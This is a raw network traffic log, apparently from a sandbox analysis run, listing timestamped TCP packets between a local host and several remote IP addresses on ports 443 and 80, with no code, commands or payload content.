                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.566975117 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.566987991 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.571415901 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.571469069 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.571480036 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.618654966 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.618753910 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.618769884 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663108110 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663146973 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663276911 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663300037 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663351059 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663362026 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663480997 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663542986 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663604021 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663610935 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663655043 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663671970 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663876057 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.663888931 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664195061 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664216995 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664336920 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664366007 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664486885 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.664496899 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.668751001 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.669157982 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.669173002 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.669898033 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.670725107 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.670780897 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.671206951 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.671220064 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.674577951 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.674813986 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.674827099 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.683665991 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.683754921 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.683768034 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.695245981 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.695338011 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.695349932 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.742042065 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.742134094 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.742149115 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.792609930 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.792695045 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.792712927 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.795440912 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.795948982 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.795970917 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.796392918 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.796399117 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.797765017 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.797832966 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.797847033 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.798043966 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.798105001 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.798118114 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.807544947 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.807612896 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.807626009 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.808604002 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811007023 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811093092 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811237097 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811275959 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811304092 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.811335087 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.813802004 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.813827991 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.814223051 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.814382076 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.814393044 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.815402985 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.816471100 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.816488028 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.817236900 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.817243099 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.817917109 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.817986965 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.817998886 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.825602055 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.825963974 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.825994968 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.826390028 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.826400995 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.845401049 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.845947027 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.845992088 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.846388102 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.846398115 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.866502047 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.866573095 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.866602898 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.917201996 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.917341948 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.918663025 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.918678999 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.918807983 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.921195984 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.927812099 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.928152084 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.928379059 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.929692984 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.929702997 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.929713011 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.929716110 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.931071043 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.931257963 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.931299925 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.931334019 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.931529999 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.932260990 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.932311058 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.932554007 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.932730913 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.932789087 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.936511040 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.941601992 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.941709042 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.941771030 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.941785097 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.941975117 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.945115089 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.945415974 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.945476055 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.947143078 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.947149992 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.947402000 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.947407007 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.955817938 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.955849886 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.955955029 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.956073999 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.956142902 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.956213951 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.956954002 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.956967115 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.957106113 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.957138062 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.961416006 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.961724043 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.961878061 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.961977959 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.963228941 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.963239908 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.963706017 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.966799021 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.966878891 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.969517946 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.969542980 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.969681025 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.969697952 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.970789909 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.971093893 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.971108913 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.971585035 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.972601891 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.972707987 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982201099 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982601881 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982722044 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982860088 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982881069 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982906103 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982917070 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982918024 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982939005 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.982999086 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.983130932 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.983141899 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.985477924 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.985515118 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.985596895 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.985704899 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.985732079 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.990030050 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.035815001 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.038094997 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041035891 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041100025 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041134119 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041244984 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041286945 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041342020 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.041356087 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.044651985 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.044715881 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.044728994 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.054591894 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.054682016 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.054696083 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.060070992 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.060862064 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.060874939 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.064991951 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.065463066 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.065474987 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.084603071 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.087096930 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.087177992 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.095458984 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.095474958 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.095715046 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.096241951 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.096266031 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.096277952 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.100914955 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.100987911 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.101085901 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.101283073 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.101315022 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.113807917 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.113867998 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.113882065 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.168020964 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.168092966 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.168107033 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.170084953 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.170258045 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.170269966 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.176348925 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.177957058 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.178024054 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.178040981 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179004908 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179022074 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179805994 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179811954 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179852962 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.179862976 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.183554888 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.183706999 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.183718920 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.188318968 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.188657045 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.188671112 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.236875057 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.236941099 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.236954927 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274466038 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274590015 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274600983 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274642944 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274687052 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274846077 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274857998 CET804979677.83.175.105192.168.2.5
